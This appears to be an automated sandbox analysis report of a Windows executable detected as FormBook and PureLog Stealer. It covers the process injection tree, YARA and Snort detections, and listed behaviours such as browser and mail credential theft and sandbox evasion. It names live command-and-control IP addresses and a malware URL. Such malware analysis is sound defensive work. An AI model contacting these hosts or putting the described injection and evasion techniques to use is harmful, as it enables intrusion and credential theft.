Edit tour

Windows Analysis Report
Petromasila 16072024.exe

Overview

General Information

Sample name:	Petromasila 16072024.exe
Analysis ID:	1474675
MD5:	89bc7fac2d6edf880fad6eb2e1b88e2e
SHA1:	96f8b4fd1c7320273f7cca3c7b4fc04c345e5f05
SHA256:	a71b6413d876deb16d675d967b8104f9a36dc11789c512828e276d74b1fc5854
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

Petromasila 16072024.exe (PID: 1248 cmdline: "C:\Users\user\Desktop\Petromasila 16072024.exe" MD5: 89BC7FAC2D6EDF880FAD6EB2E1B88E2E)

RegSvcs.exe (PID: 7836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 3644 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

udkVsCOVUH.exe (PID: 6576 cmdline: "C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

rundll32.exe (PID: 4056 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

udkVsCOVUH.exe (PID: 4916 cmdline: "C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 476 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.67398967466.0000000006B50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x144df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x144df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x144df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ebc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x278f33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2619e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ba30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x144df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.67394861728.00000000026B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x278f33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2619e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: Petromasila 16072024.exe PID: 1248	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Petromasila 16072024.exe.26d6fbc.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Petromasila 16072024.exe.6b50000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ddc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.RegSvcs.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ebc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe" , ParentImage: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe, ParentProcessId: 6576, ParentProcessName: udkVsCOVUH.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 4056, ProcessName: rundll32.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 199.59.243.226

Timestamp:	07/17/24-09:11:39.477270
SID:	2855464
Source Port:	49845
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 148.66.22.236

Timestamp:	07/17/24-09:11:53.278989
SID:	2855464
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.254.38.5

Timestamp:	07/17/24-09:07:12.143727
SID:	2855464
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 35.212.86.52

Timestamp:	07/17/24-09:06:31.858505
SID:	2855464
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 89.31.143.90

Timestamp:	07/17/24-09:09:02.040060
SID:	2855464
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 103.224.182.242

Timestamp:	07/17/24-09:09:56.019107
SID:	2855464
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 195.154.21.79

Timestamp:	07/17/24-09:09:47.285330
SID:	2855464
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.159.134.42

Timestamp:	07/17/24-09:09:26.602748
SID:	2855464
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 195.154.21.79

Timestamp:	07/17/24-09:09:44.410502
SID:	2855464
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 85.159.66.93

Timestamp:	07/17/24-09:09:12.053295
SID:	2855464
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 103.224.182.242

Timestamp:	07/17/24-09:10:01.546782
SID:	2855464
Source Port:	49822
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.254.38.5

Timestamp:	07/17/24-09:07:09.370449
SID:	2855464
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 5.252.229.221

Timestamp:	07/17/24-09:06:06.364766
SID:	2855464
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.254.38.5

Timestamp:	07/17/24-09:07:14.914232
SID:	2855464
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 35.212.86.52

Timestamp:	07/17/24-09:11:25.124361
SID:	2855464
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 45.130.41.127

Timestamp:	07/17/24-09:10:53.787010
SID:	2855464
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.254.38.5

Timestamp:	07/17/24-09:12:07.521384
SID:	2855464
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 89.31.143.90

Timestamp:	07/17/24-09:08:59.146346
SID:	2855464
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 199.59.243.226

Timestamp:	07/17/24-09:11:42.210596
SID:	2855464
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 5.252.229.221

Timestamp:	07/17/24-09:11:05.424200
SID:	2855464
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 148.66.22.236

Timestamp:	07/17/24-09:06:54.907813
SID:	2855464
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 185.104.28.238

Timestamp:	07/17/24-09:10:13.511928
SID:	2855464
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	07/17/24-09:10:28.034202
SID:	2855464
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 148.66.22.236

Timestamp:	07/17/24-09:06:57.792905
SID:	2855464
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 199.59.243.226

Timestamp:	07/17/24-09:06:43.663261
SID:	2855464
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.254.38.5

Timestamp:	07/17/24-09:12:10.285315
SID:	2855464
Source Port:	49854
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 45.130.41.127

Timestamp:	07/17/24-09:10:50.850789
SID:	2855464
Source Port:	49834
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 195.154.21.79

Timestamp:	07/17/24-09:09:41.531001
SID:	2855464
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 45.130.41.127

Timestamp:	07/17/24-09:05:51.242560
SID:	2855464
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 35.212.86.52

Timestamp:	07/17/24-09:06:26.264664
SID:	2855464
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 148.66.22.236

Timestamp:	07/17/24-09:11:56.158532
SID:	2855464
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 89.31.143.90

Timestamp:	07/17/24-09:08:56.260074
SID:	2855464
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 5.252.229.221

Timestamp:	07/17/24-09:11:02.522950
SID:	2855464
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 35.212.86.52

Timestamp:	07/17/24-09:06:29.062961
SID:	2855464
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 45.130.41.127

Timestamp:	07/17/24-09:05:48.295794
SID:	2855464
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 162.159.134.42

Timestamp:	07/17/24-09:09:29.332945
SID:	2855464
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 185.104.28.238

Timestamp:	07/17/24-09:10:10.640727
SID:	2855464
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 84.32.84.32

Timestamp:	07/17/24-09:10:25.235957
SID:	2855464
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 148.66.22.236

Timestamp:	07/17/24-09:11:59.036555
SID:	2855464
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 199.59.243.226

Timestamp:	07/17/24-09:06:40.935551
SID:	2855464
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 103.224.182.242

Timestamp:	07/17/24-09:09:58.782698
SID:	2855464
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 5.252.229.221

Timestamp:	07/17/24-09:06:03.464790
SID:	2855464
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 45.130.41.127

Timestamp:	07/17/24-09:10:47.910096
SID:	2855464
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 35.212.86.52

Timestamp:	07/17/24-09:11:27.920831
SID:	2855464
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.11.20 - Destination IP: 85.159.66.93

Timestamp:	07/17/24-09:09:14.981150
SID:	2855464
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.yummie-food.online/r9oc/?4vLHGxWP=WL056cvEyZIj6gByFShPScW0LOQ73QJfUv2rUxG28YbpHWXWZfwRrVkAlfVH8mCBDPwaqYo4ujDzPhHwaWnW8p4oxOi+u+Ey60uYY+3gnwY2DqQqdySds30=&Kn7Lg=jjMts8V	Avira URL Cloud: Label: malware
Source: http://www.yummie-food.online/r9oc/?4vLHGxWP=WL056cvEyZIj6gByFShPScW0LOQ73QJfUv2rUxG28YbpHWXWZfwRrVk	Avira URL Cloud: Label: malware
Source: http://www.yummie-food.online/r9oc/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Petromasila 16072024.exe	ReversingLabs: Detection: 42%
Source: Petromasila 16072024.exe	Virustotal: Detection: 52%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: Petromasila 16072024.exe

Joe Sandbox ML: detected

Source: Petromasila 16072024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Petromasila 16072024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: udkVsCOVUH.exe, 00000005.00000000.67680790960.000000000074E000.00000002.00000001.01000000.0000000A.sdmp, udkVsCOVUH.exe, 00000007.00000000.67904640161.000000000074E000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: RegSvcs.pdb, source: rundll32.exe, 00000006.00000002.72356870195.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905615198.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.68226266210.000000000DEFC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.67759720522.00000000012D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67766698039.0000000004AFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004DCD000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67759115636.000000000494D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.67759720522.00000000012D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.67766698039.0000000004AFA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004DCD000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72355857678.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.67759115636.000000000494D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000004.00000002.67759123257.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72354841916.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000003.67697373118.00000000012BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000004.00000002.67759123257.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72354841916.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000003.67697373118.00000000012BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: rundll32.exe, 00000006.00000002.72356870195.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905615198.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.68226266210.000000000DEFC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 6_2_02B5C480 FindFirstFileW,FindNextFileW,FindClose,

6_2_02B5C480

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then xor eax, eax	6_2_02B49B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	6_2_02B4E058
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_04BB04E8

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49779 -> 45.130.41.127:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49780 -> 45.130.41.127:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 5.252.229.221:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49784 -> 5.252.229.221:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 35.212.86.52:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 35.212.86.52:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49789 -> 35.212.86.52:80
